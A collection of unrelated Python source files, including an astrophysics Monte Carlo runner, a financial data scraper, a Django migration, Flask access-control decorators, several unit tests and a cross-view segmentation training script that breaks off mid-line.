virtual_packet_logging, packet_source=None, debug_packets=False, logger_buffer=1, single_packet_seed=None, ): self.seed = seed if packet_source is None: self.packet_source = source.BlackBodySimpleSource(seed) else: self.packet_source = packet_source # inject different packets self.disable_electron_scattering = disable_electron_scattering self.spectrum_frequency = spectrum_frequency self.virtual_spectrum_spawn_range = virtual_spectrum_spawn_range self.enable_reflective_inner_boundary = enable_reflective_inner_boundary self.inner_boundary_albedo = inner_boundary_albedo self.enable_full_relativity = enable_full_relativity numba_config.ENABLE_FULL_RELATIVITY = enable_full_relativity self.line_interaction_type = line_interaction_type self.single_packet_seed = single_packet_seed self.integrator_settings = integrator_settings self.v_packet_settings = v_packet_settings self.spectrum_method = spectrum_method self.seed = seed self._integrator = None self._spectrum_integrated = None self.virt_logging = virtual_packet_logging self.virt_packet_last_interaction_type = np.ones(2) * -1 self.virt_packet_last_interaction_in_nu = np.ones(2) * -1.0 self.virt_packet_last_line_interaction_in_id = np.ones(2) * -1 self.virt_packet_last_line_interaction_out_id = np.ones(2) * -1 self.virt_packet_nus = np.ones(2) * -1.0 self.virt_packet_energies = np.ones(2) * -1.0 self.virt_packet_initial_rs = np.ones(2) * -1.0 self.virt_packet_initial_mus = np.ones(2) * -1.0 # set up logger based on config mc_tracker.DEBUG_MODE = debug_packets mc_tracker.BUFFER = logger_buffer if self.spectrum_method == "integrated": self.optional_hdf_properties.append("spectrum_integrated") def _initialize_estimator_arrays(self, tau_sobolev_shape): """ Initialize the output arrays of the montecarlo simulation. Parameters ---------- tau_sobolev_shape : tuple tuple for the tau_sobolev_shape """ # Estimators self.j_estimator = np.zeros(tau_sobolev_shape[1], dtype=np.float64) self.nu_bar_estimator = np.zeros(tau_sobolev_shape[1], dtype=np.float64) self.j_blue_estimator = np.zeros(tau_sobolev_shape) self.Edotlu_estimator = np.zeros(tau_sobolev_shape) # TODO: this is the wrong attribute naming style. def _initialize_geometry_arrays(self, model): """ Generate the cgs like geometry arrays for the montecarlo part Parameters ---------- model : model.Radial1DModel """ self.r_inner_cgs = model.r_inner.to("cm").value self.r_outer_cgs = model.r_outer.to("cm").value self.v_inner_cgs = model.v_inner.to("cm/s").value def _initialize_packets(self, T, no_of_packets, iteration, radius): # the iteration is added each time to preserve randomness # across different simulations with the same temperature, # for example. We seed the random module instead of the numpy module # because we call random.sample, which references a different internal # state than in the numpy.random module. seed = self.seed + iteration rng = np.random.default_rng(seed=seed) seeds = rng.choice(MAX_SEED_VAL, no_of_packets, replace=True) radii, nus, mus, energies = self.packet_source.create_packets( T, no_of_packets, rng, radius ) mc_config_module.packet_seeds = seeds self.input_r = radii self.input_nu = nus self.input_mu = mus self.input_energy = energies self._output_nu = np.ones(no_of_packets, dtype=np.float64) * -99.0 self._output_energy = np.ones(no_of_packets, dtype=np.float64) * -99.0 self.last_line_interaction_in_id = -1 * np.ones( no_of_packets, dtype=np.int64 ) self.last_line_interaction_out_id = -1 * np.ones( no_of_packets, dtype=np.int64 ) self.last_line_interaction_shell_id = -1 * np.ones( no_of_packets, dtype=np.int64 ) self.last_interaction_type = -1 * np.ones(no_of_packets, dtype=np.int64) self.last_interaction_in_nu = np.zeros(no_of_packets, dtype=np.float64) self._montecarlo_virtual_luminosity = u.Quantity( np.zeros_like(self.spectrum_frequency.value), "erg / s" ) @property def spectrum(self): return TARDISSpectrum( self.spectrum_frequency, self.montecarlo_emitted_luminosity ) @property def spectrum_reabsorbed(self): return TARDISSpectrum( self.spectrum_frequency, self.montecarlo_reabsorbed_luminosity ) @property def spectrum_virtual(self): if np.all(self.montecarlo_virtual_luminosity == 0): warnings.warn( "MontecarloRunner.spectrum_virtual" "is zero. Please run the montecarlo simulation with" "no_of_virtual_packets > 0", UserWarning, ) return TARDISSpectrum( self.spectrum_frequency, self.montecarlo_virtual_luminosity ) @property def spectrum_integrated(self): if self._spectrum_integrated is None: self._spectrum_integrated = self.integrator.calculate_spectrum( self.spectrum_frequency[:-1], **self.integrator_settings ) return self._spectrum_integrated @property def integrator(self): if self._integrator is None: warnings.warn( "MontecarloRunner.integrator: " "The FormalIntegrator is not yet available." "Please run the montecarlo simulation at least once.", UserWarning, ) if self.enable_full_relativity: raise NotImplementedError( "The FormalIntegrator is not yet implemented for the full " "relativity mode. " "Please run with config option enable_full_relativity: " "False." ) return self._integrator def run( self, model, plasma, no_of_packets, no_of_virtual_packets=0, nthreads=1, last_run=False, iteration=0, total_iterations=0, show_progress_bars=True, ): """ Run the montecarlo calculation Parameters ---------- model : tardis.model.Radial1DModel plasma : tardis.plasma.BasePlasma no_of_packets : int no_of_virtual_packets : int nthreads : int last_run : bool total_iterations : int The total number of iterations in the simulation. Returns ------- None """ set_num_threads(nthreads) self.time_of_simulation = self.calculate_time_of_simulation(model) self.volume = model.volume # Initializing estimator array self._initialize_estimator_arrays(plasma.tau_sobolevs.shape) self._initialize_geometry_arrays(model) self._initialize_packets( model.t_inner.value, no_of_packets, iteration, model.r_inner[0] ) configuration_initialize(self, no_of_virtual_packets) montecarlo_radial1d( model, plasma, iteration, no_of_packets, total_iterations, show_progress_bars, self, ) self._integrator = FormalIntegrator(model, plasma, self) # montecarlo.montecarlo_radial1d( # model, plasma, self, # virtual_packet_flag=no_of_virtual_packets, # nthreads=nthreads, # last_run=last_run) def legacy_return(self): return ( self.output_nu, self.output_energy, self.j_estimator, self.nu_bar_estimator, self.last_line_interaction_in_id, self.last_line_interaction_out_id, self.last_interaction_type, self.last_line_interaction_shell_id, ) def get_line_interaction_id(self, line_interaction_type): return ["scatter", "downbranch", "macroatom"].index( line_interaction_type ) @property def output_nu(self): return u.Quantity(self._output_nu, u.Hz) @property def output_energy(self): return u.Quantity(self._output_energy, u.erg) @property def virtual_packet_nu(self): try: return u.Quantity(self.virt_packet_nus, u.Hz) except AttributeError: warnings.warn( "MontecarloRunner.virtual_packet_nu:" "Set 'virtual_packet_logging: True' in the configuration file" "to access this property" "It should be added under 'virtual' property of 'spectrum' property", UserWarning, ) return None @property def virtual_packet_energy(self): try: return u.Quantity(self.virt_packet_energies, u.erg) except AttributeError: warnings.warn( "MontecarloRunner.virtual_packet_energy:" "Set 'virtual_packet_logging: True' in the configuration file" "to access this property" "It should be added under 'virtual' property of 'spectrum' property", UserWarning, ) return None @property def virtual_packet_luminosity(self): try: return self.virtual_packet_energy / self.time_of_simulation except TypeError: warnings.warn( "MontecarloRunner.virtual_packet_luminosity:" "Set 'virtual_packet_logging: True' in the configuration file" "to access this property" "It should be added under 'virtual' property of 'spectrum' property", UserWarning, ) return None @property def packet_luminosity(self): return self.output_energy / self.time_of_simulation @property def emitted_packet_mask(self): return self.output_energy >= 0 @property def emitted_packet_nu(self): return self.output_nu[self.emitted_packet_mask] @property def reabsorbed_packet_nu(self): return self.output_nu[~self.emitted_packet_mask] @property def emitted_packet_luminosity(self): return self.packet_luminosity[self.emitted_packet_mask] @property def reabsorbed_packet_luminosity(self): return -self.packet_luminosity[~self.emitted_packet_mask] @property def montecarlo_reabsorbed_luminosity(self): return u.Quantity( np.histogram( self.reabsorbed_packet_nu, weights=self.reabsorbed_packet_luminosity, bins=self.spectrum_frequency.value, )[0], "erg / s", ) @property def montecarlo_emitted_luminosity(self): return u.Quantity( np.histogram( self.emitted_packet_nu, weights=self.emitted_packet_luminosity, bins=self.spectrum_frequency.value, )[0], "erg / s", ) @property def montecarlo_virtual_luminosity(self): return ( self._montecarlo_virtual_luminosity[:-1] / self.time_of_simulation.value ) def calculate_emitted_luminosity( self, luminosity_nu_start, luminosity_nu_end ): """ Calculate emitted luminosity. Parameters ---------- luminosity_nu_start : astropy.units.Quantity luminosity_nu_end : astropy.units.Quantity Returns ------- astropy.units.Quantity """ luminosity_wavelength_filter = ( self.emitted_packet_nu > luminosity_nu_start ) & (self.emitted_packet_nu < luminosity_nu_end) emitted_luminosity = self.emitted_packet_luminosity[ luminosity_wavelength_filter ].sum() return emitted_luminosity def calculate_reabsorbed_luminosity( self, luminosity_nu_start, luminosity_nu_end ): """ Calculate reabsorbed luminosity. Parameters ---------- luminosity_nu_start : astropy.units.Quantity luminosity_nu_end : astropy.units.Quantity Returns ------- astropy.units.Quantity """ luminosity_wavelength_filter = ( self.reabsorbed_packet_nu > luminosity_nu_start ) & (self.reabsorbed_packet_nu < luminosity_nu_end) reabsorbed_luminosity = self.reabsorbed_packet_luminosity[ luminosity_wavelength_filter ].sum() return reabsorbed_luminosity def calculate_radiationfield_properties(self): """ Calculate an updated radiation field from the :math: `\\bar{nu}_\\textrm{estimator}` and :math:`\\J_\\textrm{estimator}` calculated in the montecarlo simulation. The details of the calculation can be found in the documentation. Parameters ---------- nubar_estimator : np.ndarray (float) j_estimator : np.ndarray (float) Returns ------- t_rad : astropy.units.Quantity (float) w : numpy.ndarray (float) """ t_rad = ( self.t_rad_estimator_constant * self.nu_bar_estimator / self.j_estimator ) w = self.j_estimator / ( 4 * const.sigma_sb.cgs.value * t_rad ** 4 * self.time_of_simulation.value * self.volume.value ) return t_rad * u.K, w def calculate_luminosity_inner(self, model): """ Calculate inner luminosity. Parameters ---------- model : model.Radial1DModel Returns ------- astropy.units.Quantity """ return ( 4 * np.pi * const.sigma_sb.cgs * model.r_inner[0] ** 2 * model.t_inner ** 4 ).to("erg/s") def calculate_time_of_simulation(self, model): """ Calculate time of montecarlo simulation. Parameters ---------- model : model.Radial1DModel Returns ------- float """ return 1.0 * u.erg / self.calculate_luminosity_inner(model) def calculate_f_nu(self, frequency): pass def calculate_f_lambda(self, wavelength): pass @classmethod def from_config( cls, config, packet_source=None, virtual_packet_logging=False ): """ Create a new MontecarloRunner instance from a Configuration object. Parameters ---------- config : tardis.io.config_reader.Configuration virtual_packet_logging : bool Returns ------- MontecarloRunner """ if config.plasma.disable_electron_scattering: logger.warn( "Disabling electron scattering - this is not physical." "Likely bug in formal integral - " "will not give same results." ) numba_config.SIGMA_THOMSON = 1e-200 # mc_config_module.disable_electron_scattering = True else: logger.debug("Electron scattering switched on") numba_config.SIGMA_THOMSON = const.sigma_T.to("cm^2").value # mc_config_module.disable_electron_scattering = False spectrum_frequency = quantity_linspace( config.spectrum.stop.to("Hz", u.spectral()), config.spectrum.start.to("Hz", u.spectral()), num=config.spectrum.num + 1, ) mc_config_module.disable_line_scattering = ( config.plasma.disable_line_scattering ) return cls( seed=config.montecarlo.seed, spectrum_frequency=spectrum_frequency, virtual_spectrum_spawn_range=config.montecarlo.virtual_spectrum_spawn_range, enable_reflective_inner_boundary=config.montecarlo.enable_reflective_inner_boundary, inner_boundary_albedo=config.montecarlo.inner_boundary_albedo, enable_full_relativity=config.montecarlo.enable_full_relativity, line_interaction_type=config.plasma.line_interaction_type, integrator_settings=config.spectrum.integrated, v_packet_settings=config.spectrum.virtual, spectrum_method=config.spectrum.method, disable_electron_scattering=config.plasma.disable_electron_scattering, packet_source=packet_source, debug_packets=config.montecarlo.debug_packets, logger_buffer=config.montecarlo.logger_buffer, single_packet_seed=config.montecarlo.single_packet_seed, virtual_packet_logging=( config.spectrum.virtual.virtual_packet_logging | virtual_packet_logging ), )
py
7dfa11d01d70e0b2de4387e4d89056a691e8a706
#!/usr/bin/env python # -*- coding:utf-8 -*- """ 龙虎榜数据 Created on 2017年8月13日 @author: Jimmy Liu @group : waditu @contact: [email protected] """ import pandas as pd from io import StringIO from tushare.stock import cons as ct import time import re import lxml.html from lxml import etree try: from urllib.request import urlopen, Request except ImportError: from urllib2 import urlopen, Request def bdi(itype='D', retry_count=3, pause=0.001): for _ in range(retry_count): time.sleep(pause) try: request = Request(ct.BDI_URL%(ct.P_TYPE['http'], ct.DOMAINS['v500'])) lines = urlopen(request, timeout = 10).read() if len(lines) < 100: #no data return None except Exception as e: print(e) else: linestr = lines.decode('utf-8') if ct.PY3 else lines if itype == 'D': # Daily reg = re.compile(r'\"chart_data\",\"(.*?)\"\);') lines = reg.findall(linestr) lines = lines[0] lines = lines.replace('chart', 'table').\ replace('</series><graphs>', '').\ replace('</graphs>', '').\ replace('series', 'tr').\ replace('value', 'td').\ replace('graph', 'tr').\ replace('graphs', 'td') df = pd.read_html(lines, encoding='utf8')[0] df = df.T df.columns = ['date', 'index'] df['date'] = df['date'].map(lambda x: x.replace(u'年', '-')).\ map(lambda x: x.replace(u'月', '-')).\ map(lambda x: x.replace(u'日', '')) df['date'] = pd.to_datetime(df['date']) df['index'] = df['index'].astype(float) df = df.sort_values('date', ascending=False).reset_index(drop = True) df['change'] = df['index'].pct_change(-1) df['change'] = df['change'] * 100 df['change'] = df['change'].map(lambda x: '%.2f' % x) df['change'] = df['change'].astype(float) return df else: #Weekly html = lxml.html.parse(StringIO(linestr)) res = html.xpath("//table[@class=\"style33\"]/tr/td/table[last()]") if ct.PY3: sarr = [etree.tostring(node).decode('utf-8') for node in res] else: sarr = [etree.tostring(node) for node in res] sarr = ''.join(sarr) sarr = '<table>%s</table>'%sarr df = pd.read_html(sarr)[0][1:] df.columns = ['month', 'index'] df['month'] = df['month'].map(lambda x: x.replace(u'年', '-')).\ map(lambda x: x.replace(u'月', '')) df['month'] = pd.to_datetime(df['month']) df['month'] = df['month'].map(lambda x: str(x).replace('-', '')).\ map(lambda x: x[:6]) df['index'] = df['index'].astype(float) df['change'] = df['index'].pct_change(-1) df['change'] = df['change'].map(lambda x: '%.2f' % x) df['change'] = df['change'].astype(float) return df
py
7dfa123e114d54bfeae0745e7534548b7ceb0751
#!/usr/bin/env python3 from pathlib import Path from vunit import VUnit # ROOT ROOT = Path(__file__).resolve().parent VU = VUnit.from_argv() mathlib = VU.add_library("math_library") mathlib.add_source_files(ROOT / "../math_library/multiplier/multiplier_base_types_22bit_pkg.vhd") mathlib.add_source_files(ROOT / "../math_library/multiplier/multiplier_pkg.vhd") mathlib.add_source_files(ROOT / "../math_library/sincos/sincos_pkg.vhd") mathlib.add_source_files(ROOT / "../math_library/pi_controller/pi_controller_pkg.vhd") mathlib.add_source_files(ROOT / "../math_library/coordinate_transforms/abc_to_ab_transform/abc_to_ab_transform_pkg.vhd") mathlib.add_source_files(ROOT / "../math_library/coordinate_transforms/abc_to_ab_transform/ab_to_abc_transform_pkg.vhd") mathlib.add_source_files(ROOT / "../math_library/coordinate_transforms/ab_to_dq_transform/dq_to_ab_transform_pkg.vhd") mathlib.add_source_files(ROOT / "../math_library/coordinate_transforms/ab_to_dq_transform/ab_to_dq_transform_pkg.vhd") mathlib.add_source_files(ROOT / "../math_library/multiplier/simulation/tb_multiplier.vhd") mathlib.add_source_files(ROOT / "../math_library/coordinate_transforms/abc_to_ab_transform/abc_to_ab_transform_simulation/tb_abc_to_ab_transform.vhd") mathlib.add_source_files(ROOT / "../math_library/coordinate_transforms/ab_to_dq_transform/ab_to_dq_simulation/tb_ab_to_dq_transforms.vhd") mathlib.add_source_files(ROOT / "state_variable/state_variable_pkg.vhd") mathlib.add_source_files(ROOT / "ac_motor_models/pmsm_electrical_model_pkg.vhd") mathlib.add_source_files(ROOT / "ac_motor_models/pmsm_mechanical_model_pkg.vhd") mathlib.add_source_files(ROOT / "ac_motor_models/permanent_magnet_motor_model_pkg.vhd") mathlib.add_source_files(ROOT / "ac_motor_models/field_oriented_motor_control/field_oriented_motor_control_pkg.vhd") mathlib.add_source_files(ROOT / "lcr_filter_model/lcr_filter_model_pkg.vhd") mathlib.add_source_files(ROOT / "lcr_filter_model/lcr_filter_simulation/tb_lcr_filter.vhd") mathlib.add_source_files(ROOT / "../math_library/coordinate_transforms/ab_to_dq_transform/ab_to_dq_transform_pkg.vhd") mathlib.add_source_files(ROOT / "ac_motor_models/simulate_permanent_magnet_synchronous_machine/tb_permanent_magnet_synchronous_machine_model.vhd") mathlib.add_source_files(ROOT / "ac_motor_models/field_oriented_motor_control/field_oriented_motor_control_simulation/tb_field_oriented_motor_control.vhd") mathlib.add_source_files(ROOT / "inverter_model/inverter_model_pkg.vhd") mathlib.add_source_files(ROOT / "inverter_model/inverter_model_simulation/tb_inverter_model.vhd") mathlib.add_source_files(ROOT / "power_supply_model/power_supply_simulation_model_pkg.vhd") mathlib.add_source_files(ROOT / "power_supply_model/psu_inverter_simulation_models_pkg.vhd") mathlib.add_source_files(ROOT / "power_supply_model/power_supply_model_simulation/tb_power_supply_model.vhd") mathlib.add_source_files(ROOT / "state_variable/simulation/tb_state_variable.vhd") VU.main()
py
7dfa13e634f8cf1f4320f1629fef63754f136d75
# -*- coding: utf-8 -*- from django.db import models, migrations def delete_extra_clipboards(apps, schema_editor): """ Delete duplicate clipboards (keep the one with the most files) so a unique user constraint can be added. """ User = apps.get_model("auth", "User") users = (User.objects.all() .annotate(nr_clipboards=models.Count('filer_clipboards')) .filter(nr_clipboards__gt=1)) if not users: print("Nobody has more than one clipboard. Nothing to do here.") return for user in users: clipboards = user.filer_clipboards.all() print("Removing duplicate clipboards for {}, id {} (has {})".format( user, user.id, len(clipboards))) clipboard_to_stay = max(clipboards, key=lambda c: c.clipboarditem_set.all().count()) for clipboard in clipboards: if clipboard != clipboard_to_stay: print("Deleting clipboard with id {}".format(clipboard.id)) clipboard.delete() def show_rollback_info_message(apps, schema_editor): print("Clipboards do not need to be changed.") class Migration(migrations.Migration): dependencies = [ ('filer', '0002_auto_20150928_1109'), ] operations = [ migrations.RunPython(delete_extra_clipboards, show_rollback_info_message) ]
py
7dfa149931b5f2e3fe89861575bfba913042a670
# -*- coding: utf-8 -*- """ @Datetime: 2018/10/21 @Author: Zhang Yafei """ from kingadmin import sites from student import models from kingadmin.admin_base import BaseKingAdmin print('student kingadmin.....') class TestAdmin(BaseKingAdmin): list_display = ['name',] sites.site.register(models.Test,TestAdmin)
py
7dfa151a274491052d2bdf5978745cadadc19ffa
""" This file is part of LiberaForms. # SPDX-FileCopyrightText: 2020 LiberaForms.org # SPDX-License-Identifier: AGPL-3.0-or-later """ from functools import wraps from flask import current_app, request, g, jsonify from flask import redirect, url_for, render_template, flash from flask_babel import gettext as _ from liberaforms.utils import sanitizers from liberaforms.utils import validators def login_required(f): @wraps(f) def wrap(*args, **kwargs): if g.current_user: return f(*args, **kwargs) else: return redirect(url_for('main_bp.index')) return wrap def enabled_user_required(f): @wraps(f) def wrap(*args, **kwargs): if g.current_user and g.current_user.enabled: return f(*args, **kwargs) elif g.current_user: current_app.logger.info(f'Disabled user denied: {request.path}') else: current_app.logger.info(f'Anon user denied: {request.path}') return redirect(url_for('main_bp.index')) return wrap def enabled_user_required__json(f): @wraps(f) def wrap(*args, **kwargs): if g.current_user and g.current_user.enabled: return f(*args, **kwargs) elif g.current_user: current_app.logger.info(f'Disabled user denied: {request.path}') else: current_app.logger.info(f'Anon user denied: {request.path}') return jsonify("Denied"), 401 return wrap def admin_required(f): @wraps(f) def wrap(*args, **kwargs): if g.is_admin: return f(*args, **kwargs) elif g.current_user: current_app.logger.info(f'Non admin user denied: {request.path}') else: current_app.logger.info(f'Anon user denied: {request.path}') return redirect(url_for('main_bp.index')) return wrap def rootuser_required(f): @wraps(f) def wrap(*args, **kwargs): if g.current_user and g.current_user.is_root_user(): return f(*args, **kwargs) else: return redirect(url_for('main_bp.index')) return wrap def anon_required(f): @wraps(f) def wrap(*args, **kwargs): if g.current_user: return redirect(url_for('main_bp.index')) else: return f(*args, **kwargs) return wrap """ def queriedForm_editor_required(f): @wraps(f) def wrap(*args, **kwargs): queriedForm=models.Form.find(id=kwargs['id'], editor_id=str(g.current_user.id)) if not queriedForm: flash(_("Form is not available. 404"), 'warning') return redirect(make_url_for('forms_bp.my_forms')) kwargs['queriedForm']=queriedForm return f(*args, **kwargs) return wrap """ def sanitized_slug_required(f): @wraps(f) def wrap(*args, **kwargs): if not 'slug' in kwargs: if g.current_user: flash("No slug found!", 'error') return render_template('page-not-found.html'), 404 if kwargs['slug'] in current_app.config['RESERVED_SLUGS']: if g.current_user: flash("Reserved slug!", 'warning') return render_template('page-not-found.html'), 404 if kwargs['slug'] != sanitizers.sanitize_slug(kwargs['slug']): if g.current_user: flash("That's a nasty slug!", 'warning') return render_template('page-not-found.html'), 404 return f(*args, **kwargs) return wrap def sanitized_key_required(f): @wraps(f) def wrap(*args, **kwargs): if not ('key' in kwargs and kwargs['key'] == sanitizers.sanitize_string(kwargs['key'])): if g.current_user: flash(_("That's a nasty key!"), 'warning') return render_template('page-not-found.html'), 404 else: return f(*args, **kwargs) return wrap def sanitized_token(f): @wraps(f) def wrap(*args, **kwargs): if 'token' in kwargs and not validators.is_valid_UUID(kwargs['token']): if g.current_user: flash(_("That's a nasty token!"), 'warning') return render_template('page-not-found.html'), 404 else: return f(*args, **kwargs) return wrap
py
7dfa15f6da20a3dd1327e0038849b925dee6b49a
# coding:utf-8 from base import TestBase class TestLowercase(TestBase): """Test for attributes \'lowercase\'""" # for debug # def tearDown(self): # pass text = """ <!-- MarkdownTOC autolink=true uri_encoding=false {0} --> <!-- /MarkdownTOC --> # ПРИМЕР EXAMPLE # One Two Three """ def get_only_ascii(self, toc): self.assert_In("- [ПРИМЕР EXAMPLE](#ПРИМЕР-example)", toc) self.assert_In("- [One Two Three](#one-two-three)", toc) def get_all(self, toc): self.assert_In("- [ПРИМЕР EXAMPLE](#пример-example)", toc) self.assert_In("- [One Two Three](#one-two-three)", toc) def get_none(self, toc): self.assert_In("- [ПРИМЕР EXAMPLE](#ПРИМЕР-EXAMPLE)", toc) self.assert_In("- [One Two Three](#One-Two-Three)", toc) def test_default(self): toc = self.init_update(self.text.format(""))["toc"] self.get_only_ascii(toc) def test_false(self): toc = self.init_update(self.text.format('lowercase="false"'))["toc"] self.get_none(toc) def test_only_ascii(self): toc = self.init_update(self.text.format('lowercase="only_ascii"'))["toc"] self.get_only_ascii(toc) def test_all(self): toc = self.init_update(self.text.format('lowercase="all"'))["toc"] self.get_all(toc) def test_others(self): toc = self.init_update(self.text.format('lowercase="xxxxx"'))["toc"] self.get_all(toc)
py
7dfa1634a6c32fc4deaa34007e9e3f34785377f1
""" Goal: create a session and database tables so we can run data tests @see https://docs.python.org/3/library/unittest.mock-examples.html """ import unittest # from binascii import unhexlify from mock import patch from olass import utils from olass.models import base from olass.olass_client import OlassClient from olass.models.patient import Patient def dummy_get_access_token(*args, **kwargs): return None def dummy_get_patient_hashes(*args, **kwargs): return {}, {} def dummy_send_hashes_to_server(*args, **kwargs): return True class BaseTestCase(unittest.TestCase): def __init__(self, *args, **kwargs): super(BaseTestCase, self).__init__(*args, **kwargs) @patch.multiple(OlassClient, get_access_token=dummy_get_access_token, # get_patient_hashes=dummy_get_patient_hashes, send_hashes_to_server=dummy_send_hashes_to_server) def setUp(self): """ create all tables """ super(BaseTestCase, self).setUp() self.app = OlassClient(config_file='config/settings_tests.py', interactive=False, create_tables=True) self.session = self.app.session self.create_patients() # TODO: move this line to a dedicated test self.app.run() def tearDown(self): """ remove all tables """ super(BaseTestCase, self).tearDown() base.metadata.drop_all(self.app.engine) # self.app.session.remove() def create_patients(self): when = utils.format_date('01-01-1950') Patient.create( pat_mrn=1, pat_birth_date=when, pat_first_name='First', pat_last_name='Last' )
py
7dfa168209f210be044e8b4617c273e81b5b458f
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import paddle.fluid as fluid import paddle import paddle.fluid.dygraph as dg import numpy as np import unittest class TestComplexReshape(unittest.TestCase): def setUp(self): self._dtypes = ["float32", "float64"] self._places = [paddle.CPUPlace()] if fluid.core.is_compiled_with_cuda(): self._places.append(paddle.CUDAPlace(0)) def test_shape_norm_dims(self): for dtype in self._dtypes: x_np = np.random.randn( 2, 3, 4).astype(dtype) + 1j * np.random.randn(2, 3, 4).astype(dtype) shape = (2, -1) for place in self._places: with dg.guard(place): x_var = dg.to_variable(x_np) y_var = paddle.reshape(x_var, shape) y_np = y_var.numpy() self.assertTrue(np.allclose(np.reshape(x_np, shape), y_np)) def test_shape_omit_dims(self): for dtype in self._dtypes: x_np = np.random.randn( 2, 3, 4).astype(dtype) + 1j * np.random.randn(2, 3, 4).astype(dtype) shape = (0, -1) shape_ = (2, 12) for place in self._places: with dg.guard(place): x_var = dg.to_variable(x_np) y_var = paddle.reshape(x_var, shape) y_np = y_var.numpy() self.assertTrue(np.allclose(np.reshape(x_np, shape_), y_np)) if __name__ == "__main__": unittest.main()
py
7dfa17bddeca8a55544db7ac7e2f2231534abbd1
import argparse import os import random import time from pathlib import Path import crossView import numpy as np import copy import torch import torch.nn as nn import torch.optim as optim from torch.autograd import Variable from torch.utils.data import DataLoader from torch import autograd # from torch.optim.lr_scheduler import ExponentialLR # from torch.optim.lr_scheduler import StepLR from torch.optim.lr_scheduler import MultiStepLR # from torch.optim.lr_scheduler import CosineAnnealingLR from tensorboardX import SummaryWriter from PIL import Image import matplotlib.pyplot as PLT import matplotlib.cm as mpl_color_map from opt import get_args import tqdm from losses import compute_losses from utils import mean_IU, mean_precision def readlines(filename): """Read all the lines in a text file and return as a list """ with open(filename, 'r') as f: lines = f.read().splitlines() return lines class Trainer: def __init__(self): self.opt = get_args() self.models = {} self.weight = {"static": self.opt.static_weight, "dynamic": self.opt.dynamic_weight} self.seed = self.opt.global_seed self.device = "cuda" self.criterion_d = nn.BCEWithLogitsLoss() self.parameters_to_train = [] self.transform_parameters_to_train = [] self.detection_parameters_to_train = [] self.base_parameters_to_train = [] self.parameters_to_train = [] self.parameters_to_train_D = [] self.criterion = compute_losses() self.create_time = time.strftime("%Y-%m-%d-%H-%M", time.localtime()) self.epoch = 0 self.start_epoch = 0 self.scheduler = 0 # Save log and models path self.opt.log_root = os.path.join(self.opt.log_root, self.opt.split) self.opt.save_path = os.path.join(self.opt.save_path, self.opt.split) if self.opt.split == "argo": self.opt.log_root = os.path.join(self.opt.log_root, self.opt.type) self.opt.save_path = os.path.join(self.opt.save_path, self.opt.type) self.writer = SummaryWriter(os.path.join(self.opt.log_root, self.opt.model_name, self.create_time)) self.log = open(os.path.join(self.opt.log_root, self.opt.model_name, self.create_time, '%s.csv' % self.opt.model_name), 'w') if self.seed != 0: self.set_seed() # set seed # Initializing models self.models["encoder"] = crossView.Encoder(18, self.opt.height, self.opt.width, True) self.models['CycledViewProjection'] = crossView.CycledViewProjection(in_dim=8) self.models["CrossViewTransformer"] = crossView.CrossViewTransformer(128) self.models["decoder"] = crossView.Decoder( self.models["encoder"].resnet_encoder.num_ch_enc, self.opt.num_class) self.models["transform_decoder"] = crossView.Decoder( self.models["encoder"].resnet_encoder.num_ch_enc, self.opt.num_class, "transform_decoder") for key in self.models.keys(): self.models[key].to(self.device) if "discr" in key: self.parameters_to_train_D += list( self.models[key].parameters()) elif "transform" in key: self.transform_parameters_to_train += list(self.models[key].parameters()) else: self.base_parameters_to_train += list(self.models[key].parameters()) self.parameters_to_train = [ {"params": self.transform_parameters_to_train, "lr": self.opt.lr_transform}, {"params": self.base_parameters_to_train, "lr": self.opt.lr}, ] # Optimization self.model_optimizer = optim.Adam( self.parameters_to_train) # self.scheduler = ExponentialLR(self.model_optimizer, gamma=0.98) # self.scheduler = StepLR(self.model_optimizer, step_size=step_size, gamma=0.65) self.scheduler = MultiStepLR(self.model_optimizer, milestones=self.opt.lr_steps, gamma=0.1) # self.scheduler = CosineAnnealingLR(self.model_optimizer, T_max=15) # iou 35.55 self.patch = (1, self.opt.occ_map_size // 2 ** 4, self.opt.occ_map_size // 2 ** 4) self.valid = Variable( torch.Tensor( np.ones( (self.opt.batch_size, *self.patch))), requires_grad=False).float().cuda() self.fake = Variable( torch.Tensor( np.zeros( (self.opt.batch_size, *self.patch))), requires_grad=False).float().cuda() # Data Loaders dataset_dict = {"3Dobject": crossView.KITTIObject, "odometry": crossView.KITTIOdometry, "argo": crossView.Argoverse, "raw": crossView.KITTIRAW, "habitat": crossView.Habitat} self.dataset = dataset_dict[self.opt.split] fpath = os.path.join( os.path.dirname(__file__), "splits", self.opt.split, "{}_files.txt") train_filenames = readlines(fpath.format("train")) val_filenames = readlines(fpath.format("val")) self.val_filenames = val_filenames self.train_filenames = train_filenames train_dataset = self.dataset(self.opt, train_filenames) val_dataset = self.dataset(self.opt, val_filenames, is_train=False) self.train_loader = DataLoader( train_dataset, self.opt.batch_size, True, num_workers=self.opt.num_workers, pin_memory=True, drop_last=True) self.val_loader = DataLoader( val_dataset, 1, True, num_workers=self.opt.num_workers, pin_memory=True, drop_last=True) if self.opt.load_weights_folder != "": self.load_model() print("Using split:\n ", self.opt.split) print( "There are {:d} training items and {:d} validation items\n".format( len(train_dataset), len(val_dataset))) def train(self): if not os.path.isdir(self.opt.log_root): os.mkdir(self.opt.log_root) self.validation(self.log) for self.epoch in range(self.start_epoch, self.opt.num_epochs + 1): self.adjust_learning_rate(self.model_optimizer, self.epoch, self.opt.lr_steps) loss = self.run_epoch() output = ("Epoch: %d | lr:%.7f | Loss: %.4f | topview Loss: %.4f | transform_topview Loss: %.4f | " "transform Loss: %.4f" % (self.epoch, self.model_optimizer.param_groups[-1]['lr'], loss["loss"], loss["topview_loss"], loss["transform_topview_loss"], loss["transform_loss"])) print(output) self.log.write(output + '\n') self.log.flush() for loss_name in loss: self.writer.add_scalar(loss_name, loss[loss_name], global_step=self.epoch) if self.epoch % self.opt.log_frequency == 0: self.validation(self.log) if self.opt.model_split_save: self.save_model() self.save_model() def process_batch(self, inputs, validation=False): outputs = {} for key, input in inputs.items(): if key not in ["filename", "folder", "frame_index"]: inputs[key] = input.to(self.device) features = self.models["encoder"](inputs["color"]) # Cross-view Transformation Module x_feature = features transform_feature, 